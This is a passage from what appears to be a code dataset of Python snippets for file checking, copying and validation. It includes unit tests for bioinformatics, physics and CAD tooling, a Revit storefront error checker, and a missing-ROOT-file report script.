copy_to=out_bxr))\n\n # copy data\n out_bxr['3BRecInfo/3BRecVars/NRecFrames'] = [n_frames]\n out_bxr['nSamplesPerRecording'] = n_samples\n tot_samples = sum(n_samples)\n assert np.isclose(tot_samples/n_frames, 4096) #4096 channels\n \n # copy raw data\n raw_dtype = bxrs[0][\"3BData/Raw\"].dtype\n dset = out_bxr.create_dataset(\"3BData/Raw\", (tot_samples,),\n dtype=raw_dtype)\n start_sample = 0\n max_chunk = int(1e8) # <1GiB \n for i, b in enumerate(bxrs):\n print(f\"Copying {files[i]}\")\n end_sample = start_sample+n_samples[i]\n for s in tqdm(range(0,n_samples[i],max_chunk)):\n e = min(s+max_chunk, end_sample)\n dset[start_sample+s:start_sample+e] = b[\"3BData/Raw\"][s:e]\n start_sample = end_sample\n\n # cleanup\n out_bxr.close()\n [b.close() for b in bxrs]", "def test_errors(in_fastq, references):\n error_checks = [0, 1, 2, 3]\n for error in error_checks:\n for ref in references:\n print ref[\"file\"], error\n run_bowtie(in_fastq, ref[\"file\"], None, error, 1e6)", "def testFailFiles(self):\n # Cleaning possible files already occupying the available set\n self.dummySubscription.failFiles([])\n\n # First test - Test if initial file (on available set) is inserted in the\n # failed set - no arguments\n\n dummyFile2 = File('/tmp/dummyfile2,8888', 1, 1, 1)\n # Insert dummyFile2 into the available files Set at dummySubscription\n self.dummySubscription.available.addFile(dummyFile2)\n\n S = self.dummySubscription.availableFiles()\n # Fail all files\n self.dummySubscription.failFiles(S)\n\n assert len(self.dummySubscription.availableFiles()) == 0, \\\n \"failed subscription still has %s files, what's up with that?\" % \\\n len(self.dummySubscription.availableFiles())\n\n # Second test - Test if target files are inserted at the failed set\n\n dummyFileList = []\n # Populating the dummy List with a random number of files\n for i in range(1, random.randint(100, 1000)):\n lfn = '/store/data/%s/%s/file.root' % (random.randint(1000, 9999),\n random.randint(1000, 9999))\n size = random.randint(1000, 2000)\n events = 1000\n run = random.randint(0, 2000)\n lumi = random.randint(0, 8)\n\n file = File(lfn=lfn, size=size, events=events,\n checksums={\"cksum\": \"1\"})\n file.addRun(Run(run, *[lumi]))\n dummyFileList.append(file)\n # Add the new files\n self.dummySubscription.available.addFile(dummyFileList)\n # and fail them\n self.dummySubscription.failFiles(files=dummyFileList)\n # Check there are no files available - everything should be failed\n assert len(self.dummySubscription.availableFiles()) == 0, \\\n \"failed subscription still has %s files, what's up with that?\" % \\\n len(self.dummySubscription.availableFiles())\n\n # Check if all files were inserted at subscription's failed files Set\n for x in dummyFileList:\n assert x in self.dummySubscription.failed.getFiles(type='set'), \\\n 'Couldn\\'t make file failed %s' % x.dict['lfn']\n\n # Third test - Test if a replicate file is erased from the other Sets,\n # when a file is considered failed\n\n dummyFile3 = File('/tmp/dummyfile3,5555', 1, 1, 1)\n dummyFileList = []\n dummyFileList.append(dummyFile3)\n\n # Inserting dummyFile3 to be used as an argument, into each of the other\n # file sets\n self.dummySubscription.acquired.addFile(dummyFile3)\n self.dummySubscription.available.addFile(dummyFile3)\n self.dummySubscription.completed.addFile(dummyFile3)\n\n # Run the method failFiles\n self.dummySubscription.failFiles(files=dummyFileList)\n\n # Check if dummyFile3 was inserted at the failed Set\n assert dummyFile3 in self.dummySubscription.failed.getFiles(type='set'), \\\n 'Replicated file could\\'nt be inserted at failed Set'\n\n # Check if dummyFile3 was erased from all the other Sets\n assert dummyFile3 not in self.dummySubscription.acquired.getFiles(type='set'), \\\n 'Failed file still present at acquired Set'\n assert dummyFile3 not in self.dummySubscription.completed.getFiles(type='set'), \\\n 'Failed file still present at completed Set'\n assert dummyFile3 not in self.dummySubscription.available.getFiles(type='set'), \\\n 'Failed file still present at available Set'", "def checkCopiedFiles(self):\n self.missingAiCopies = 0\n self.invalidAiCopies = 0\n self.invalidMapCopies = 0\n self.missingMapCopies = 0\n\n for iFile in self.inputFilesAll:\n if not (os.path.isfile(self.MAPCOPY + iFile + '.msb')):\n self.missingMapCopies += 1\n else:\n with open(self.MAPCOPY + iFile + '.msb', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidMapCopies += 1\n\n if not (iFile == \"m12_00_00_01\"):\n if (self.useDCX):\n if not (os.path.isfile(self.AICOPY + iFile + '.luabnd.dcx')):\n self.missingAiCopies += 1\n else:\n with open(self.AICOPY + iFile + '.luabnd.dcx', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidAiCopies += 1\n else:\n if not (os.path.isfile(self.AICOPY + iFile + '.luabnd')):\n self.missingAiCopies += 1\n else:\n with open(self.AICOPY + iFile + '.luabnd', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidAiCopies += 1\n\n if (self.missingAiCopies > 0 or self.invalidAiCopies > 0 or self.missingMapCopies > 0 or self.invalidMapCopies > 0 or self.missingSfxCopies > 0 or self.invalidSfxCopies > 0):\n return False\n else:\n return True", "def test_duplicate_images_error(self):\n with self.assertRaises(AssertionError):\n disk.merge_datasets(self.input_datasets, self.output_dataset)\n\n # Original dataset shouldn't be modified.\n self.assertEqual(0, len(self.output_dataset.metadata()))", "def test_verify_corrupt_archive_compare_data(self):\n self.backup(u\"full\", u\"testfiles/various_file_types\", options=[])\n output_files = os.listdir(\"testfiles/output\")\n archives = [elem for elem in output_files if \"vol\" in elem]\n for archive in archives:\n # Edit source file\n with open(\"testfiles/output/\" + archive, 'r+') as f:\n f.write('This writes text into each archive file to corrupt it.')\n # Test verify for the file\n try:\n self.verify(u'testfiles/various_file_types/executable', file_to_verify=u'executable',\n options=[u\"--compare-data\"])\n except CmdError as e:\n # Should return a 21 error code for \"hash mismatch\"\n self.assertEqual(e.exit_status, 21, str(e))\n else:\n self.fail('Expected Hash Mismatch Error not thrown')", "def check_files(filenames, fix, verboseout, summaryout):\n\tokmsg = \"OK\" if not fix else \"fixed\"\n\tbadmsg = \"non-conforming\"\n\tbad_files = 0\n\tfor fn in filenames:\n\t\tlines = read_file_and_maybe_fix_it(fn, fix)\n\t\tif check_content(fn, lines, verboseout):\n\t\t\tprint(\"{:s}: {}\".format(fn, okmsg), file=summaryout)\n\t\telse:\n\t\t\tbad_files += 1\n\t\t\tmsg = \"{:s}: {}\".format(fn, badmsg)\n\t\t\tprint(msg, file=summaryout)\n\treturn bad_files", "def _test_align_file_existance(self):\n if len(self._pathcreator.get_read_files()) == 0:\n self._write_err_msg_and_quit(\"Error! No read libraries given!\\n\")\n if len(self._ref_seq_files) == 0:\n self._write_err_msg_and_quit(\n \"Error! No reference sequence files given!\\n\"\n )", "def test_does_not_validate_invalid_files(self):\n bad_files = (\n 'newstest2019-defr-src-ts.de.sgm',\n 'newstest2019-defr-src-ts.de.xml',\n )\n for bad_file in bad_files:\n bad_path = join(getcwd(), 'testdata', bad_file)\n with self.assertRaises(ValueError):\n _ = valitest.ValidatableTestSet(bad_path)", "def perform_filecheck():\n\n\t# Open files\n\ttrain = open('train_aae_final', 'r')\n\ttest = open('test_aae_final', 'r')\n\n\n\t# Check number of training and testing samples\n\tprint (\"\")\n\tprint (\"Number of training samples =\", len(train.readlines()))\n\tprint (\"Number of testing samples =\", len(test.readlines()))\n\tprint (\"\")\n\n\ttrain.close()\n\ttest.close()", "def test_css_top_files_belong(self):\n top, std, bottom = heavy_lifting.organize_css_files(self.fake_file_list)\n for fle in top:\n self.assertIn(os.path.basename(fle), list_css_top_files())", "def test_css_bottom_files_belong(self):\n top, std, bottom = heavy_lifting.organize_css_files(self.fake_file_list)\n for fle in bottom:\n self.assertIn(os.path.basename(fle), list_css_bottom_files())", "def test_stress_not_in_two_files(generate_no_stress_one_file):\n fname = generate_no_stress_one_file\n with pytest.raises(Exception):\n process_files([fname, fname])", "def hash_check_files(self):\n temp_error = 0\n if not self.hash_log_curr:\n self.hash_log_curr = self.hash_curr_files\n else:\n for key, value in self.hash_curr_files.iteritems():\n if key in self.hash_log_curr:\n #test for valid hash\n if self.valid is not None:\n #test any valid hahses are given\n if key in self.valid:\n # a hash code that is ok to duplicate\n self.print_to_log('Valid Duplicate HashCode, skipping: ' + value[5])\n self.hash_log_curr[key][3] = str(int(self.hash_log_curr[key][3]) + 1)\n self.hash_log_curr[key][4] = value[4]\n continue\n # not valid duplicate hash\n # a dupulicate hash found which is a failure and should abort import\n self.hash_log_curr[key][0] = 'Fail'\n self.hash_log_curr[key][3] = str(int(self.hash_log_curr[key][3]) + 1)\n self.hash_log_curr[key][4] = value[4]\n self.hash_log_curr[key][5] += ', ' + value[5]\n self.print_to_log('Duplicate hash found for file: ' + value[5])\n temp_error = 1\n else:\n #a new hash, no issues\n self.hash_log_curr[key] = value\n self.print_to_log('New Hash for file: ' + value[5])\n self.error = temp_error", "def allSWCImport_test():\n\n swcFiles = []\n\n for dirPath, dirNames, fileNames in os.walk(\"tests/117.v3dpbd\"):\n\n swcFiles += [os.path.join(dirPath, fileName)\n for fileName in fileNames if fileName.endswith(\".swc\")]\n\n for swcFile in swcFiles:\n\n print(\"Testing the import of {}\".format(swcFile))\n try:\n NeuronMorphology(swcFile)\n\n except Exception as e:\n if swcFile in [\n 'tests/117.v3dpbd/10_117.v3dpbd_ENT_updated.swc',\n \"tests/117.v3dpbd/05_117.v3dpbd_Advantra.swc\",\n \"tests/117.v3dpbd/15_117.v3dpbd_app2new2.swc\",\n \"tests/117.v3dpbd/01_117.v3dpbd_axis_analyzer.swc\",\n \"tests/117.v3dpbd/18_117.v3dpbd_x1439_y1439_z474_app2.swc\",\n \"tests/117.v3dpbd/13_117.v3dpbd_app2new1.swc\",\n \"tests/117.v3dpbd/12_117.v3dpbd_Advantra_updated.swc\",\n \"tests/117.v3dpbd/19_117.v3dpbd_NeuroGPSTree_updated.swc\",\n \"tests/117.v3dpbd/21_117.v3dpbd_tubularity_model_S.v3draw_MST_Tracing_Ws_21_th_200.swc\",\n \"tests/117.v3dpbd/14_117.v3dpbd_app2new3.swc\",\n \"tests/117.v3dpbd/20_117.v3dpbd_tubularity_model_S.v3draw_MST_Tracing_Ws_21_th_170_updated.swc\",\n \"tests/117.v3dpbd/11_117.v3dpbd_NeuronChaser_updated.swc\",\n \"tests/117.v3dpbd/22_117.v3dpbd_Rayshooting.swc\",\n ]:\n print(e)\n assert type(e) is NotImplementedError and \\\n str(e) == \"No Soma Found for {}\".format(swcFile)\n elif swcFile in [\n \"tests/117.v3dpbd/03_117.v3dpbd_NeuroGPSTree.swc\",\n \"tests/117.v3dpbd/08_117.v3dpbd_neutube_updated.swc\",\n \"tests/117.v3dpbd/04_117.v3dpbd_axis_analyzer_updated.swc\",\n \"tests/117.v3dpbd/06_117.v3dpbd_MOST.swc\",\n \"tests/117.v3dpbd/09_117.v3dpbd_neutu_autotrace.swc\",\n \"tests/117.v3dpbd/07_117.v3dpbd_neutube.swc\",\n \"tests/117.v3dpbd/02_117.v3dpbd_MST_Tracing.swc\",\n ]:\n print(e)\n assert type(e) is ValueError and \\\n str(e) == \"Given SWC File {} has more than one trees\".format(swcFile)\n\n elif swcFile in [\n \"tests/117.v3dpbd/16_117.v3dpbd_EnsembleNeuronTracerV2n.swc\",\n \"tests/117.v3dpbd/17_117.v3dpbd_EnsembleNeuronTracerV2s.swc\"\n ]:\n print(e)\n assert type(e) is AssertionError and \\\n str(e) == \"File {} has cyclic connections!\".format(swcFile)\n\n else:\n print(e)\n assert False", "def test_file_analyzer(self):\r\n file_analyzer = FileAnalyzer(\"C:\\\\Users\\\\Himan\\\\Desktop\\\\Semester 2\\\\SSW 810\\\\HW\\\\Assignment 8\")\r\n self.assertEqual(file_analyzer.files_summary, {'HW08_Himanshu.py': {'class': 1, 'function': 5, 'line': 100, 'char': 4472}, \\\r\n 'HW08_Test_Himanshu.py': {'class': 1, 'function': 3, 'line': 38, 'char': 1861}})\r\n self.assertNotEqual(file_analyzer.files_summary, {'HW08_Himanshu.py': {'class': 0, 'function': 5, 'line': 46, 'char': 1931}})\r\n\r\n self.assertNotEqual(file_analyzer.files_summary, {'HW08_Himanshu.py': {'class': 1, 'function': 5, 'line': 100}}) # testing less fields\r\n\r\n with self.assertRaises(FileNotFoundError): # raises exception error\r\n FileAnalyzer(\"C:\\\\Users\\\\Himan\\\\Desktop\\\\Semester 2\\\\SSW 810\\\\HW\\\\Assignment 10\").files_summary", "def output_errors(outputs, gold, sick_ids, sick_sentences):\n with open('./working/err.txt', 'w') as out_f:\n out_f.write('pair_ID\\tdiff\\tpred\\tcorr\\tsentence1\\tsentence2\\n')\n errs = []\n for i, line in enumerate(outputs):\n data = line\n corr = gold[i]\n diff = abs(data-corr)\n if diff > 0.75:\n errs.append((sick_ids[i], round(diff, 1), round(data, 1), corr, ' '.join(sick_sentences[i][0]), ' '.join(sick_sentences[i][1])))\n\n errs.sort(key=lambda x:-x[1])\n\n for line in errs:\n out_f.write('{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\n'.format(*line))", "def storefront_check_errors():\n\n\tcurrentView = uidoc.ActiveView\n\tfamTypeDict = GetFamilyTypeDict(\"Fabrication-Error-Symbol\")\n\n\t# Clear existing error notations\n\terrorNotations = list(GetElementsInView(BuiltInCategory.OST_GenericAnnotation, Autodesk.Revit.DB.FamilyInstance, currentView.Id))\n\terrorNotations = FilterElementsByName(doc, errorNotations,[\"Fabrication\",\"Error-Symbol\"], False)\n\tif errorNotations:\n\t\twith rpw.db.Transaction(\"Place Errors\"):\n\t\t\tfor error in errorNotations:\n\t\t\t\tdoc.Delete(error)\n\n\n\tdef PointsAndErrors(mullions_list, errorName, cat_or_ids):\n\t\t\"\"\"adds to lists of points and errors\"\"\"\n\t\terrorsToFlag = []\n\t\tcompList =[]\n\t\tfor m in mullions_list:\n\t\t\tmElem = doc.GetElement(m)\n\t\t\tif m not in compList:\n\t\t\t\tintersectingMulls = FindIntersectingMullions(mElem, cat_or_ids)\n\t\t\t\tif list(intersectingMulls):\n\t\t\t\t\tmullPt = mElem.Location.Point\n\t\t\t\t\terrorsToFlag.append([mullPt, errorName])\n\t\t\t\t\tfor mm in list(intersectingMulls):\n\t\t\t\t\t\tcompList.append(mm.Id)\n\t\treturn errorsToFlag\n\n\tdef MullionClash():\n\n\t\terrorsToFlag = []\n\n\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\tallMullions = GetAllElements(doc, BuiltInCategory.OST_CurtainWallMullions, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\n\t\tallWalls = FilterElementsByName(doc, allWalls, [\"Storefront\",\"Storefront\"], True)\n\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Mullion Intersects\", BuiltInCategory.OST_CurtainWallMullions)\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Panel Intersects\", BuiltInCategory.OST_CurtainWallPanels)\n\t\tif allWalls:\n\t\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Wall Intersects\", allWalls)\n\n\t\treturn errorsToFlag\n\n\tdef PanelClash():\n\n\n\t\terrorsToFlag = []\n\t\t\n\t\tallPanels = GetAllElements(doc, BuiltInCategory.OST_Windows, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallPanels = FilterDemolishedElements(doc, allPanels)\n\n\t\tpanelMinWidth = 0.45\n\t\tpanelMaxWidth = 5.0\n\t\tpanelMaxHeight = 8.14\n\n\t\t### ITERATE OVER PANEL LIST ###\n\t\tfor p in allPanels:\n\t\t\tfamInst = doc.GetElement(p)\n\n\t\t\tpan_height = famInst.Parameter[BuiltInParameter.FAMILY_HEIGHT_PARAM].AsDouble()\n\t\t\tpan_width = famInst.Parameter[BuiltInParameter.FAMILY_WIDTH_PARAM].AsDouble()\n\n\t\t\tif \"empty\" not in famInst.Name.lower():\n\t\t\t\tif pan_width < panelMinWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Small Panel\"])\n\t\t\t\telif pan_width > panelMaxWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Wide Panel\"])\n\t\t\t\telif pan_height > panelMaxHeight:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Tall Panel\"])\n\t\t\telse:\n\t\t\t\tpass\n\t\t\n\t\treturn errorsToFlag\n\n\tdef ECWallClash():\n\n\t\terrorsToFlag = []\n\t\tcolumnsLinesEdgesEC = []\n\t\twallsLinesEdgesEC = []\n\n\n\t\tdocLoaded = RevitLoadECDocument(quiet=True)\n\t\tif docLoaded[0]:\n\t\t\tdocEC = docLoaded[0]\n\t\t\tecTransform = docLoaded[1]\n\n\t\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\t\tselectedLevelInst = doc.GetElement(selectedLevel)\n\t\t\tlevelElevationEC = None \n\t\t\tfor p in selectedLevelInst.Parameters:\n\t\t\t\tif p.Definition.Name == \"Elevation\":\n\t\t\t\t\tlevelElevationEC = p.AsDouble()\n\n\t\t\tallWallsEC = GetAllElements(docEC, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall)\n\t\t\tallColumnsEC = GetAllElements(docEC, BuiltInCategory.OST_Columns, Autodesk.Revit.DB.FamilyInstance)\n\t\t\tallColumnsEC += GetAllElements(docEC, BuiltInCategory.OST_StructuralColumns, Autodesk.Revit.DB.FamilyInstance)\n\n\t\t\tselectedWallsEC = FilterElementsByLevel(docEC, allWallsEC, levelElevationEC)\n\t\t\tselectedColumnsEC = FilterElementsByLevel(docEC, allColumnsEC, levelElevationEC)\n\n\t\t\twallsLinesEdgesEC = GetWallEdgeCurves(docEC, selectedWallsEC, ecTransform)\n\t\t\tcolumnsLinesEdgesEC = GetColumnEdgeCurves(docEC, selectedColumnsEC, ecTransform)\n\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\t\tstorefrontWalls = FilterElementsByName(doc, allWalls,[\"Storefront\",\"Storefront\"], False)\n\t\tstorefrontWalls = FilterWallsByKind(doc, storefrontWalls, \"Basic\")\n\n\t\tobstructionEdges = columnsLinesEdgesEC\n\t\tobstructionEdges += wallsLinesEdgesEC\n\n\t\tif obstructionEdges:\n\t\t\tfor sfWallId in storefrontWalls:\n\t\t\t\tsfWall = doc.GetElement(sfWallId)\n\t\t\t\tlocLine = sfWall.Location.Curve\n\t\t\t\tlocLineStart = locLine.GetEndPoint(0)\n\t\t\t\tlocLineEnd = locLine.GetEndPoint(1)\n\n\t\t\t\tfor obstructionLine in obstructionEdges:\n\t\t\t\t\tobstLineElevation = obstructionLine.GetEndPoint(0).Z\n\t\t\t\t\tlocLineStart = XYZ(locLineStart.X, locLineStart.Y, obstLineElevation)\n\t\t\t\t\tlocLineEnd = XYZ(locLineEnd.X, locLineEnd.Y, obstLineElevation)\n\t\t\t\t\tlocLineFlat = Line.CreateBound(locLineStart, locLineEnd)\n\t\t\t\t\tintersection = RevitCurveCurveIntersection(locLineFlat,obstructionLine)\n\n\t\t\t\t\tif intersection:\n\t\t\t\t\t\t#ERROR: Hit Existing Condition\n\t\t\t\t\t\terrorsToFlag.append([intersection, \"Hit EC\"])\n\n\t\treturn errorsToFlag\n\n\tallErrors = []\n\tallErrors += ECWallClash()\n\tallErrors += MullionClash()\n\tallErrors += PanelClash()\n\n\terrorSymbolId = famTypeDict[\"Fabrication-Error-Symbol\"]\n\n\tif allErrors:\n\t\twith rpw.db.Transaction(\"Error Check\"):\n\t\t\tRevitPlaceErrorsInView(currentView, allErrors, errorSymbolId)", "def test_check_mapping_file_multiple_problems(self):\r\n\r\n check_mapping_file(mapping_fp=self.errors_warnings_mapping_fp,\r\n output_dir=self.output_dir,\r\n added_demultiplex_field=\"DoesNotExist\",\r\n verbose=False)\r\n\r\n # Check existence of expected output files\r\n output_html_fp = join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt', '.html'))\r\n output_corrected_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt',\r\n '_corrected.txt'))\r\n output_log_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt', '.log'))\r\n overlib_js_fp = join(self.output_dir, 'overlib.js')\r\n\r\n self.assertTrue(exists(output_html_fp))\r\n self.assertTrue(exists(output_corrected_fp))\r\n self.assertTrue(exists(output_log_fp))\r\n self.assertTrue(exists(overlib_js_fp))\r\n\r\n # Check output data for expected results\r\n\r\n html_data = \"\".join([line for line in open(output_html_fp, \"U\")])\r\n corrected_data =\\\r\n \"\".join([line for line in open(output_corrected_fp, \"U\")])\r\n log_data = \"\".join([line for line in open(output_log_fp, \"U\")])\r\n\r\n self.assertEqual(html_data, self.expected_html_errors_warnings_output)\r\n self.assertEqual(corrected_data,\r\n self.expected_corrected_data_errors_warnings)\r\n self.assertEqual(log_data, self.expected_log_errors_warnings_output)", "def checkMissingFiles(inDir, jsonUrl):\n\n file_list = []\n remote = False\n try:\n file_list = os.listdir(inDir)\n except OSError:\n remote = True\n file_list = eos_ls(inDir)\n\n if file_list == []:\n print \"Directory does not exist or is empty!\"\n return []\n\n total_expected = 0\n missing_files = []\n suspicious_files = []\n recovered_files = []\n\n print 'Found %d files in input directory' % len(file_list)\n print 20*'-'\n\n jsonFile = open(jsonUrl,'r')\n procList = json.load(jsonFile,encoding = 'utf-8').items()\n\n for proc in procList:\n for desc in proc[1]:\n data = desc['data']\n isData = desc.get('isdata',False)\n mctruthmode = desc.get('mctruthmode')\n for d in data:\n dtag = d.get('dtag','')\n split = d.get('split',1)\n\n for segment in range(0,split):\n eventsFile = dtag\n if split > 1:\n eventsFile = dtag + '_' + str(segment)\n if mctruthmode:\n eventsFile += '_filt%d' % mctruthmode\n filename = eventsFile+'.root'\n\n sys.stdout.write('... checking %s' % filename)\n sys.stdout.flush()\n\n total_expected += 1\n\n if not filename in file_list:\n missing_files.append(filename)\n sys.stdout.write('\\033[91m MISSING \\033[0m \\n')\n # sys.stdout.flush()\n continue\n\n rootFileUrl = os.path.join(inDir, filename)\n if remote:\n rootFileUrl = ('root://eoscms//eos/cms/store' +\n rootFileUrl.split('store',1)[1])\n\n recovered, suspicious = False, False\n tfile = TFile.Open(rootFileUrl)\n try:\n if tfile.TestBit(TFile.kRecovered):\n recovered = True\n if tfile.IsZombie():\n suspicious = True\n tfile.Close()\n except AttributeError, ReferenceError:\n suspicious = True\n\n if recovered:\n sys.stdout.write('\\033[93m Recovered \\033[0m \\n')\n recovered_files.append(filename)\n if suspicious:\n sys.stdout.write('\\033[93m Failed to open \\033[0m \\n')\n suspicious_files.append(filename)\n\n sys.stdout.write('\\033[92m OK \\033[0m \\n')\n sys.stdout.flush()\n\n print 20*'-'\n if len(missing_files):\n print \"Missing the following files:\"\n print \"(%d out of %d expected)\"% (len(missing_files), total_expected)\n for filename in missing_files:\n print filename\n else:\n print \"NO MISSING FILES!\"\n print 20*'-'\n if len(suspicious_files):\n print \"Failed to open the following files:\"\n print \"(%d out of %d expected)\"% (len(suspicious_files), total_expected)\n for filename in suspicious_files:\n print filename\n print 20*'-'\n if len(recovered_files):\n print \"The following files are recovered:\"\n print \"(%d out of %d expected)\"% (len(recovered_files), total_expected)\n for filename in recovered_files:\n print filename\n print 20*'-'\n\n return missing_files+suspicious_files+recovered_files", "def test_two_files():\n\n out_file = ''.join(\n random.choices(string.ascii_uppercase + string.digits, k=5))\n try:\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n rv, out = getstatusoutput(f'{prg} -f {tair} {amigo} -o {out_file}')\n assert rv == 0\n assert re.search('1: tair_heat.txt', out)\n assert re.search('2: amigo_heat.txt', out)\n assert re.search(\n f'Wrote 20 gene IDs from 2 files to file \"{out_file}\"', out)\n assert os.path.isfile(out_file)\n exp_two = '\\n'.join(\n sorted(\"\"\"\n AT5G12020 AT3G06400 AT2G33590 AT1G54050 AT5G67030 AT4G14690 AT1G16030 AT5G03720 AT3G10800 \n AT5G12140 AT1G64280 AT3G24500 AT3G09440 AT3G04120 AT4G19630 AT1G16540 AT2G22360 AT1G13930 \n AT5G41340 AT3G24520\n \"\"\".split()))\n assert open(out_file).read().strip() == exp_two.strip()\n\n finally:\n if os.path.isfile(out_file):\n os.remove(out_file)", "def test_process_two_filenames(generate_expected_two_files):\n # create local variables and run fixtures\n einfo = generate_expected_two_files\n expected = einfo['expected']\n fname = einfo['file_names']\n results = process_files([fname['stress'], fname['strain']])\n # compare the pifs\n A = results.properties[0].scalars\n B = expected['stress'].properties[0].scalars\n C = results.properties[1].scalars\n D = expected['strain'].properties[0].scalars\n assert np.array_equal(A, B), \\\n 'Results and expected pifs differ in stress values'\n assert np.array_equal(C, D), \\\n 'Results snd expected pifs differ in strain values'\n assert getattr( results, 'uid', None) is None, \\\n 'Result UID should be None'\n assert getattr(results, 'names', None) is None, \\\n 'Result should not be named'\n assert getattr(results, 'classifications', None) is None, \\\n 'Result should not have any classifications.'\n assert len(results.properties) == \\\n len(expected['stress'].properties) + \\\n len(expected['strain'].properties), \\\n 'The length of the result and expected properties lists do not match.'\n assert getattr(results, \"ids\", None) is None, \\\n 'Result ids should be None'\n assert getattr(results, 'source', None) is None, \\\n 'Result source should be None'\n assert getattr(results, 'quantity', None) is None, \\\n 'Result quantity should be None'\n assert getattr(results, 'preparation', None) is None,\\\n 'Result preparation should be None'\n assert getattr(results, \"subSystems\", None) is None, \\\n 'Results subSystem should be None'\n assert getattr(results, 'references', None) is None,\\\n 'Results references should be None'\n assert getattr(results, 'contacts', None) is None, \\\n 'Results contacts should be None'\n assert getattr(results, 'licenses', None) is None,\\\n 'Results licenses should be None'\n assert getattr(results,'tags', None) is None,\\\n 'Results tags should be None'", "def check_files(fileglob, parser=None, detail=1):\n if parser is None:\n parser = get_parser()\n failed = []\n for tcd_file in sorted(glob.glob(fileglob)):\n print(f'### {tcd_file}', end='')\n try:\n parsed = check_file(tcd_file, show=False, parser=None)\n if detail >= 1:\n print(': OK')\n if detail >= 2:\n print(parsed.pretty())\n # Here, we indeed do want to surface any exception whatsoever.\n except Exception as exn: # pylint:disable=broad-except\n if detail >= 1:\n print(f': FAILED {exn!r}')\n failed.append(tcd_file)\n return failed", "def test_main_with_titanium_error(self):\r\n\r\n command = \" \".join([\"denoiser.py\",\r\n \"--force\", \"-o\", self.test_dir,\r\n \"-i\", \"%s/qiime/support_files/denoiser/TestData/denoiser_test_set.sff.txt\" % PROJECT_HOME,\r\n \"-f\", \"%s/qiime/support_files/denoiser/TestData/test_set_seqs.fna\" % PROJECT_HOME,\r\n \"-e\", \"%s/qiime/support_files/denoiser/Data/Titanium_error_profile.dat\" % PROJECT_HOME])\r\n\r\n result = Popen(command, shell=True, universal_newlines=True,\r\n stdout=PIPE, stderr=STDOUT).stdout.read()\r\n self.result_dir = self.test_dir\r\n\r\n observed = \"\".join(list(open(self.result_dir + \"centroids.fasta\")))\r\n self.assertEqual(observed, self.expected)\r\n\r\n observed = \"\".join(\r\n list(open(self.result_dir + \"denoiser_mapping.txt\")))\r\n self.assertEqual(observed, self.expected_titanium_map_string)", "def _checkOutputs(self, outputs, random=False, errorthreshold=0.001):\n for out in outputs:\n outFile = os.path.join(self._testDir, self.outputDir, out)\n fileGoldStd = os.path.join(self.goldDir, out)\n \n # Check the expect output file was produced\n msg = \"Missing expected output file:\\n output: %s\" % outFile\n self.assertTrue(os.path.exists(outFile), red(msg))\n \n if random:\n print(yellow(\"WARNING: %s was created using a random seed, check skipped...\" % outFile))\n else:\n fnGoldStd = xmippLib.FileName(fileGoldStd)\n if fnGoldStd.isImage():\n im1 = xmippLib.Image(fileGoldStd)\n im2 = xmippLib.Image(outFile)\n msg = \"Images are not equal (+-%f):\\n output: %s\\n gold: %s\" % \\\n (errorthreshold, outFile, fileGoldStd)\n self.assertTrue(im1.equal(im2, errorthreshold), red(msg))\n elif fnGoldStd.isMetaData():\n msg = \"MetaDatas are not equal:\\n output: %s\\n gold: %s\" % (outFile, fileGoldStd)\n self.assertTrue(xmippLib.compareTwoMetadataFiles(outFile, fileGoldStd), red(msg))\n else:\n msg = \"Files are not equal:\\n output: %s\\n gold: %s\" % (outFile, fileGoldStd)\n self.assertTrue(xmippLib.compareTwoFiles(outFile, fileGoldStd, 0), red(msg))", "def validate_files(dir, files_to_merge):\r\n for path in files_to_merge:\r\n pathname = dir.joinpath(path)\r\n if not pathname.exists():\r\n raise Exception(\"I18N: Cannot generate because file not found: {0}\".format(pathname))", "def test_run(self):\n files = [\n (\"AS1-1.phy_r8s.txt\", \"AS1-1.phy_r8s.txt_2.5.txt\"),\n (\"AS1-3.phy_r8s.txt\", \"AS1-3.phy_r8s.txt_2.5.txt\"),\n (\"AS1-4.phy_r8s.txt\", \"AS1-4.phy_r8s.txt_2.5.txt\"),\n ]\n for file_pair in files:\n input_file = file_pair[0]\n expected_file = file_pair[1]\n infile = self.test_data_path + input_file\n outfile = self.test_data_path + expected_file\n divnum = 2.5\n result = run(infile, divnum)\n\n with open(outfile) as handle:\n expected_result = handle.read()\n self.assertEqual(expected_result, result)", "def test_process_single_file(generate_expected_one_file):\n einfo = generate_expected_one_file\n expected = einfo['expected']\n fname = einfo['file_name']\n results = process_files([fname])\n # compare the pifs\n A = results.properties[0].scalars\n B = expected.properties[0].scalars\n C = results.properties[1].scalars\n D = expected.properties[1].scalars\n assert np.array_equal(A, B), \\\n 'Result and expected pifs differ in stress values'\n assert np.array_equal(C, D), \\\n 'Result and expected pifs differ in strain values'\n assert getattr( results, 'uid', None) is None, \\\n 'Result UID should be None'\n assert getattr(results, 'names', None) is None, \\\n 'Result should not be named'\n assert getattr(results, 'classifications', None) is None, \\\n 'Result should not have any classifications.'\n assert len(results.properties) == 